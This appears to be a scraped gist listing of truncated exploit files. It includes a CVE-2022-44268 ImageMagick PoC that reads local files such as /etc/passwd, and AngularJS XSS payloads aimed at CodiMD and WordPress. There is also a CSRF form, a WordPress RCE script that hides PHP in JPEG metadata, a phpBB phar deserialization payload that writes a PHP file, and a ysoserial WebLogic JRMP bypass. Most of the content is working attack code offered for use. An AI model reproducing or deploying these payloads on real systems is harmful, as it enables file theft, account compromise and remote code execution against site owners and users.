View CVE-2022-44268.py
import sys | |
import struct | |
import zlib | |
import argparse | |
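# Command-line interface for the script. The trailing "| |" table residue left
# by the page extraction is dropped so that each statement parses again.
# Going by the help text, giving --input switches the script to parse-only
# mode; the code that acts on these options is not part of this excerpt.
parser = argparse.ArgumentParser()
parser.add_argument(
    "-s",
    "--size",
    type=int,
    default=256,
    help="size of an image in px (default: 256)",
)
parser.add_argument(
    "-f",
    "--file",
    type=str,
    default="/etc/passwd",
    help="local file to read (default: /etc/passwd)",
)
parser.add_argument(
    "-o",
    "--output",
    type=str,
    default="expl.png",
    # Help-text typo fixed ("expoit" -> "exploit"); option names and defaults are unchanged.
    help="output exploit image name (default: expl.png)",
)
parser.add_argument(
    "-i",
    "--input",
    type=str,
    help="an image name for parse, if specified then the script only parses the result",
)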
View ajp-packet.py
import struct | |
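def pack_string(s):
    """Serialize *s* as a length-prefixed, NUL-terminated byte string.

    Args:
        s: Text to encode, or None.

    Returns:
        For None, a big-endian signed 16-bit -1 (two 0xFF bytes). Otherwise a
        big-endian unsigned 16-bit length, the UTF-8 bytes of *s*, and one
        terminating zero byte.

    Raises:
        struct.error: If the encoded text is longer than 65535 bytes.
    """
    if s is None:
        return struct.pack(">h", -1)
    encoded = s.encode("utf8")
    # The prefix must count encoded bytes, not characters: sizing the field
    # from len(s) truncated any non-ASCII text and understated its length.
    return struct.pack(">H", len(encoded)) + encoded + b"\x00"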
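# Packet constants; the code that uses them is not part of this excerpt.
# The trailing "| |" extraction residue is removed so both lines parse.
magic = 0x1234
# One signed byte holding the value 2, labelled "forward request" by the author.
prefix_code = struct.pack("b", 2)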
View xss-payload.js
<!-- attr="--> | |
<script src=https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.0.1/angular.min.js> | |
</script> | |
<div ng-app> | |
{{constructor.constructor('eval(atob(\'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 |
View codimd-notes-poison.js
var host = document.location.hostname + ':' + document.location.port; | |
var notedummy = '//'+host+'/socket.io/?noteId=NOTE_ID&EIO=3'; | |
var payload = '<!-- attr="--><script src=https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.0.1/angular.min.js></script><div ng-app>{{constructor.constructor(\'alert(1)\')()}}</div>" -->\n'; | |
$.get('/me', function(data){ | |
if(data.status=="ok") { | |
$.get('/history', function(data) { | |
if(data.history.length > 0) { | |
for(h in data.history) { | |
var currentNoteId = data.history[h].id; |
View csrf.html
<html> | |
<body> | |
<form action="http://wpxss.vh/wp-comments-post.php" method="POST"> | |
<input type="text" name="comment" value="<a title='xss" style=left:0;top:0;position:fixed;display:block;width:1000%;height:1000% onmousemove=eval(atob("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 |
View wordpress-rce.js
var wpnonce = ''; | |
var ajaxnonce = ''; | |
var wp_attached_file = ''; | |
var imgurl = ''; | |
var postajaxdata = ''; | |
var post_id = 0; | |
var cmd = '<?php phpinfo();/*'; | |
var cmdlen = cmd.length | |
var payload = '\xff\xd8\xff\xed\x004Photoshop 3.0\x008BIM\x04\x04'+'\x00'.repeat(5)+'\x17\x1c\x02\x05\x00\x07PAYLOAD\x00\xff\xe0\x00\x10JFIF\x00\x01\x01\x01\x00`\x00`\x00\x00\xff\xdb\x00C\x00\x06\x04\x05\x06\x05\x04\x06\x06\x05\x06\x07\x07\x06\x08\x0a\x10\x0a\x0a\x09\x09\x0a\x14\x0e\x0f\x0c\x10\x17\x14\x18\x18\x17\x14\x16\x16\x1a\x1d%\x1f\x1a\x1b#\x1c\x16\x16 , #&\x27)*)\x19\x1f-0-(0%()(\xff\xc0\x00\x0b\x08\x00\x01\x00\x01\x01\x01\x11\x00\xff\xc4\x00\x14\x00\x01'+'\x00'.repeat(15)+'\x08\xff\xc4\x00\x14\x10\x01'+'\x00'.repeat(16)+'\xff\xda\x00\x08\x01\x01\x00\x00?\x00T\xbf\xff\xd9'; | |
var img = payload.replace('\x07PAYLOAD', String.fromCharCode(cmdlen) + cmd); |
View poc.js
// All greets goes to RIPS Tech | |
// Run this JS on Attachment Settings ACP page | |
var plupload_salt = ''; | |
var form_token = ''; | |
var creation_time = ''; | |
var filepath = 'phar://./../files/plupload/$salt_aaae9cba5fdadb1f0c384934cd20d11czip.part'; // md5('evil.zip') = aaae9cba5fdadb1f0c384934cd20d11czip | |
// your payload here | |
var payload = '<?php __HALT_COMPILER(); ?>\x0d\x0a\xfe\x01\x00\x00\x01\x00\x00\x00\x11\x00\x00\x00\x01'+'\x00'.repeat(5)+'\xc8\x01\x00\x00O:31:"GuzzleHttp\x5cCookie\x5cFileCookieJar":4:{s:41:"\x00GuzzleHttp\x5cCookie\x5cFileCookieJar\x00filename";s:30:"/var/www/html/phpBB3/pinfo.php";s:52:"\x00GuzzleHttp\x5cCookie\x5cFileCookieJar\x00storeSessionCookies";b:1;s:36:"\x00GuzzleHttp\x5cCookie\x5cCookieJar\x00cookies";a:1:{i:0;O:27:"GuzzleHttp\x5cCookie\x5cSetCookie":1:{s:33:"\x00GuzzleHttp\x5cCookie\x5cSetCookie\x00data";a:3:{s:7:"Expires";i:1;s:7:"Discard";b:0;s:5:"Value";s:17:"<?php phpinfo();#";}}}s:39:"\x00GuzzleHttp\x5cCookie\x5cCookieJar\x00strictMode";N;}\x08\x00\x00\x00test.txt\x04\x00\x00\x00 |
View JRMPClient_20180718_bypass01.java
// All respects goes to Zhiyi Zhang of 360 ESG Codesafe Team | |
// URL: https://blogs.projectmoon.pw/2018/10/19/Oracle-WebLogic-Two-RCE-Deserialization-Vulnerabilities/ | |
package ysoserial.payloads; | |
import com.sun.jndi.rmi.registry.ReferenceWrapper_Stub; | |
import sun.rmi.server.UnicastRef; | |
import sun.rmi.transport.LiveRef; | |
import sun.rmi.transport.tcp.TCPEndpoint; | |
import ysoserial.payloads.annotation.Authors; | |
import ysoserial.payloads.annotation.PayloadTest; |
View script-loader.calls
070: $scripts->add( 'utils', "/wp-includes/js/utils$suffix.js" ); | |
... | |
078: $scripts->add( 'common', "/wp-admin/js/common$suffix.js", array('jquery', 'hoverIntent', 'utils'), false, 1 ); | |
... | |
086: $scripts->add( 'wp-a11y', "/wp-includes/js/wp-a11y$suffix.js", array( 'jquery' ), false, 1 ); | |
... | |
088: $scripts->add( 'sack', "/wp-includes/js/tw-sack$suffix.js", array(), '1.6.1', 1 ); | |
... | |
090: $scripts->add( 'quicktags', "/wp-includes/js/quicktags$suffix.js", array(), false, 1 ); | |
... |